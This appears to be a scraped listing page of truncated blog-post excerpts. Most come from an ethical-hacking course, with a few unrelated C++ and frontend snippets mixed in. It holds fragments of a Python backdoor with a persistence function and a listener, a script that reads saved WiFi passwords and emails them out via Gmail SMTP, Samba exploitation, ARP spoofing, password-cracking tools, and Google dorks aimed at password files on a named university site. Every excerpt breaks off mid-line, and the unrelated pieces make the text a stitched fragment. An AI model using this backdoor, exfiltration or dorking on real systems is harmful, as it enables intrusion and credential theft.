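https://www.shodan.io Shodan was written by web engineer John Matherly and is known as "the scariest search engine"; it can scan every device that can connect to the internet. Besides common web servers, it can also scan firewalls, routers, switches, cameras, printers and any other networked device. ip 114.114.114.114 C:\Users\DI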
Server Side Attack Analysing scan results and exploiting target system. Go to the Analysis page and find the target host. Scan result - services: Scan result - Vulnerabilities: Scan result - credentials: Try to log in to the database using
Server side attacks - code execution. Let's analyze the Zenmap scan result first and search for vulnerabilities in Samba smbd 3.x. We find the following vulnerability and try to use it. https://www.rapid7.com/db/modules/exploit/multi/samba/
Targeted packet sniffing airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface] Now all the data will be stored in the file name specified after the --write option. We can analyze this data using Wireshark. The only problem is that t
Implementing Code To Discover XSS in Parameters 1. Watch the URL of the XSS reflected page carefully. 2. Add the test_xss_in_link method in the Scanner class. #!/usr/bin/env pythonimport requestsimport refrom bs4 import BeautifulSoupfrom urllib.p
VULNERABILITY_SCANNER How to discover a vulnerability in a web application? 1. Go into every possible page. 2. Look for ways to send data to the web application(URL + Forms). 3. Send payloads to discover vulnerabilities. 4. Analyze the response to check o
EXPLOITATION - XSS VULNS XSS - CROSS SITE SCRIPTING VULNS Allow an attacker to inject javascript code into the page. The code is executed when the page loads. The code is executed on the client machine, not the server. Three main types: 1. Persistent/St
Polish the Python code by sending requests in a session. Class Scanner. #!/usr/bin/env pythonimport requestsimport refrom urllib.parse import urljoinclass Scanner: def __init__(self, url, ignore_links): self.session = requests.Session()
VULNERABILITY_SCANNER How to discover a vulnerability in a web application? 1. Go into every possible page. 2. Look for ways to send data to web application(URL + Forms). 3. Send payloads to discover vulnerabilities. 4. Analyze the response to check of th
Convert Python Programs to OS X Executables https://files.pythonhosted.org/packages/4a/08/6ca123073af4ebc4c5488a5bc8a010ac57aa39ce4d3c8a931ad504de4185/pip-19.3-py2.py3-none-any.whl
Adding Icons to Generated Executables Prepare a proper icon file. https://www.iconfinder.com/ Convert the downloaded png file to an icon file. https://www.easyicon.net/language.en/covert/ Convert the Python program to Windows executable -
Polish the Python code by adding the become_persistent function. #!/usr/bin/env pythonimport jsonimport socketimport subprocessimport osimport base64import sysimport shutilclass Backdoor: def __init__(self, ip, port): self.become_persistent()
1. site syntax 2. filetype syntax site:stbu.edu.cn filetype:txt 密码 3. inurl / allinurl syntax (inurl is generally used) 4. intitle / allintitle syntax 5. intext / allintext syntax 6. Other syntax 7. Special characters | & + - " 8. Searching for network devices i
Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: An incorrect command is sent. The correct command is misused. Listener: #!/usr/bin/env pythonimport socketimport jsonimport base64class Listener:
File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read the file as a sequence of characters. 2. Send this sequence of characters. 3. Create a new empty file at the destination. 4. Store the transferred sequence
The idea is very simple: there are only 3 possible answers, but some details need extra attention. code: #include <bits/stdc++.h>#define N 300002 #define setIO(s) freopen(s".in","r",stdin) using namespace std; int val[N],hd[N],to[N<<1],nex[N<<1],d1[N],d2[N],n,edges,maxx,mx,m
Stealing WiFi Password Saved on a Computer #!/usr/bin/env pythonimport smtplibimport subprocessimport redef send_mail(email, password, message): server = smtplib.SMTP("smtp.gmail.com", 587) server.starttls() server.login(email, passwor
https://klionsec.github.io/2014/12/14/search-hacking/ Skillfully using Google hacking to help us penetrate quickly http://www.sec-redclub.com/archives/116/ 红日安全 https://www.freebuf.com/articles/web/32610.html
Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they did not send a request. 2. Clients trust responses without any form of verification. 1. Run the following command on the victim - Windows 10 Machine. ar
Preparation: Python libraries used in the following programming: 1. Requests Document: https://2.python-requests.org//en/master/ 2. Beautiful Soup Documentation: https://www.crummy.com/software/BeautifulSoup/bs4/doc/ Install the lib on Kali Linux: apt-get instal
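Password cracking: dictionary, hybrid (adding simple digits or symbols), brute force. Trojans, spyware, keyloggers, rootkits. Password recovery software: password recovery bundle trial. Windows login: SAM verifies local and remote logins; encrypted; located under the system path, system32/config/sam. Tools: Ophcrack and L0phtCrack. Mobile tools: flexispy, password crabber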
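Original: klionsec. Basic commands intitle: search for the specified keyword in page titles inurl: search for the specified keyword in URLs intext: search for the specified keyword in page content filetype: search for the specified file extension site: search for the specified content within a given site link: search for links related to this link Wildcards +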
Original article: https://medium.freecodecamp.org/modern-frontend-hacking-cheatsheets-df9c2566c72a The best front-end hacking cheatsheets — all in one place. It is impossible to memorize every API by heart, which is why cheatsheets exist. 1.Javascript ES2015 features 2.Javascrip
#include<cstdio> #include<iostream> #include<algorithm> #include<queue> #include<cstring> #include<string> #include<stack> #include<vector> #include<set> #include<map> #include<cmath> using
1) Download the image and boot it in a virtual machine https://download.vulnhub.com/devrandom/pipe.ova 2) nmap scan and probing. Start with an Nmap scan: ╰─ nmap -Pn -sV -p- 10.10.202.0/24 Nmap scan report for 10.10.202.247 Host is up (0.0068s latency). Not shown: 65531 filtered ports PORT STA